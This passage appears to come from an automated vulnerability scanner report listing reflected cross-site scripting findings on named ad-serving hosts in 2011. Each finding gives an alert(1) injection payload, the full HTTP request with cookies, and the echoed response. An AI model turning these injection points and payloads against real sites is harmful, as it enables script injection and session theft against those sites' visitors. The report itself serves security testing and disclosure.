Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:bef81';alert(1)//7636571d18a;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',bef81';alert(1)//7636571d18a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,bef81';alert(1)//7636571d18a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.156. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20c48"%3balert(1)//9211c166c4e was submitted in the $ parameter. This input was echoed as 20c48";alert(1)//9211c166c4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=20c48"%3balert(1)//9211c166c4e&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:20c48";alert(1)//9211c166c4e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:59 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:59 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',20c48";alert(1)//9211c166c4e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,20c48";alert(1)//9211c166c4e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.157. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b5f'-alert(1)-'606f1eb024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?79b5f'-alert(1)-'606f1eb024=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:57 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fmr.js;qs=79b5f'-alert(1)-'606f1eb024=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.158. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c98b'%3balert(1)//05ebf60c76b was submitted in the q parameter. This input was echoed as 5c98b';alert(1)//05ebf60c76b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=5c98b'%3balert(1)//05ebf60c76b&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5c98b';alert(1)//05ebf60c76b';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=5c98b';alert(1)//05ebf60c76b;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.159. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a24e"%3balert(1)//78bd77ef7b2 was submitted in the q parameter. This input was echoed as 4a24e";alert(1)//78bd77ef7b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=4a24e"%3balert(1)//78bd77ef7b2&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='4a24e";alert(1)//78bd77ef7b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=4a24e";alert(1)//78bd77ef7b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.160. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.inskinmedia.com
Path:   /trackports/rep/base/track.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15067<script>alert(1)</script>559c6769366 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp129764733685915067<script>alert(1)</script>559c6769366&type=init&section_id=124015&content_type=PAGE&page_url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31 HTTP/1.1
Host: dev.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Content-type: text/html
Date: Mon, 14 Feb 2011 01:40:07 GMT
Server: lighttpd/1.4.19
Content-Length: 66

jsonp129764733685915067<script>alert(1)</script>559c6769366(null);

1.161. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.inskinmedia.com
Path:   /trackports/rep/base/track.php

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload bdd5a<script>alert(1)</script>01f935525e0 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

